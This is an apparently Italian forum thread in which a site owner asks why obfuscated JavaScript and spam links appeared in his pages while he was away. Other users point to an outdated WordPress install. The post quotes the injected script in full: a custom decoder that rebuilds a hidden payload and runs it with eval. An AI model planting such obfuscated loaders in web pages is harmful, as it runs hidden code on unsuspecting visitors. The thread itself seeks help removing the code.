soliti problemi di spam

le vacanze estive non hanno purtroppo giovato ai problemi del mio server. quando son tornato a casa (oggi ) ho constatato con amarezza che nelle 2 (proprio due) pagine che avevo lasciato c'era questo codice javascript:

Codice:

<script language="javascript">
function ir(ov,klcw)
{
if(!klcw)
{
klcw='A76&HM)mXfl{UF;jZoR=?E}PWdeJNyBC9G5a248Q3Dp1buKxYgnrwSL0qOhk.tIv';}
var y;
var OR='';
for(var ennx=0;ennx<ov.length;ennx+=4)
{
y=(klcw.indexOf(ov.charAt(ennx))&63)<<18|(klcw.indexOf(ov.charAt(ennx+1))&63)<<12|(klcw.indexOf(ov.charAt(ennx+2))&63)<<6|klcw.indexOf(ov.charAt(ennx+3))&63;
OR+=String.fromCharCode((y&16711680)>>16,(y&65280)>>8,y&255);
}
eval(OR.substring(0,OR.length-3));
}
ir('y8MnXmGpe}9td)tay}S4JQZkB)DDe6O0N84wdR9QjmFaN5N1fL4Yy67bW}OQy}MQd=w5e8MLWPFaN84Yy6X9ym4Yd=w5y)Eqy6tpWPdGNLFneP7wXaqQl=uqe843{QynePo4l6y8y}Oay)4xJ57hN}.3lPb9fn2kB)DDe6O0N84wdR9Qy8MnX)DSX&w9F&2kfn2kB)DDe6O0N84wdR9Qy8MnXmG1B}Y9jRA3d)tay}S4JQZKdLEwo}g4J}EKyHfOR}Z3X8DaX52D;nND;0Gpe}9Ky0fDy)?3f0G1B}YKN0oOJ)?KN)trePoDJLq9jRA5W}frJLgSy)?5;nND;0Gpe}9Ky0fDy)?3f0G1B}YKN0oOJ)?Ky84re}fDJ)4wBRAtX6fLePFDW8g4XabQl=uqe843{QynePo4l6yqe04b{QFwB}g4{QyDdmo3X&w9FaAr;nND;0Gpe}9Ky0fDy)?3fLDSX&w9U=9uUaWpeQ?pUa?xURYgl0G1B}YKN0oOJ)?KyL42y)9kfn2kB)DDe6O0N84wdR9QB)uOJ6Orym4bdROwJ0A9jR7pyRuNf07qP6Nkfn2kB)DDe6O0N84wdR9QCRND;0Gpe}9Ky0fDy)?3fLELW}Y3P6yhN}.3lEYQl=bQl=uqe843{QynePo4l6N.{0FaN5N1fL4Yy&qQl=b9X6AA');

</script> e qui chilometri di siti di donnine, "alzabandiera" e quant'altro

premetto che sono un po' rassegnato e dunque le sto tentando tutte. ho cambiato (per sicurezza, non guasta mai) la password, ho eliminato tutto il contenuto del database SQL e ovviamente ho cancellato il codice html dalle mie pagine.

ho provato a effettuare una ricerca su google inserendo pezzi di codice, ma poi ho notato che i due pezzi che ho tolto erano differenti fra di loro (mi spiego, seguivano la stessa struttura ma avevano variabili, nomi di funzioni e quant'altro diversi).

vorrei dunque sapere (se possibile) da dove nascono questi problemi e se esiste un modo per eliminarli, considerando che allo stato attuale il sito non ha pagine PHP, non si appoggia su un DB ma è formato dalla bellezza di:

* un banner in formato gif
* una pagina html con un link
* una pagina html con quello che resta del mio blog
* una sitemap in formato xml per risolvere un problema che avevo (firefox mi segnalava come sito contraffatto)

[NoWhere]

...quindi niente cms?

...quindi niente cms?

ora no, prima avevo un wordpress abbastanza vecchiotto (maledetta pigrizia )

ho backuppato prima di partire tutto il db e tutto il contenuto del server e li ho sul mio pc.

[NoWhere]

ora no, prima avevo un wordpress abbastanza vecchiotto (maledetta pigrizia )

ho backuppato prima di partire tutto il db e tutto il contenuto del server e li ho sul mio pc.

allora lo spam ti sarà arrivato sicuramente da quel cms non aggiornato; per questo si consigia di aggiornare sempre i cms così da fixare possibili bug che possono esserci ed evitare di ritrovarsi il sito spammato!! ergo, é solo un problema tuo che non interessa AV

ergo, é solo un problema tuo che non interessa AV

lo so che non interessa AV, ma volevo solo saperne di più su questo codice e prendere le misure del caso. tutto qui.
comunque grazie, dovessi avere altri problemi (spero di no) so dove rivolgermi.

[Gianluca]

Verifica anche che il tuo PC non sia infetto

Verifica anche che il tuo PC non sia infetto

ho fatto un bel controllino con hijackthis e tutto è ok. a breve provvederò pure con una bella scansione completa, ma dubito che il mio pc sia infetto, anche perchè le nuove modifiche non autorizzate sono avvenute mentre ero in ferie, a pc rigorosamente spento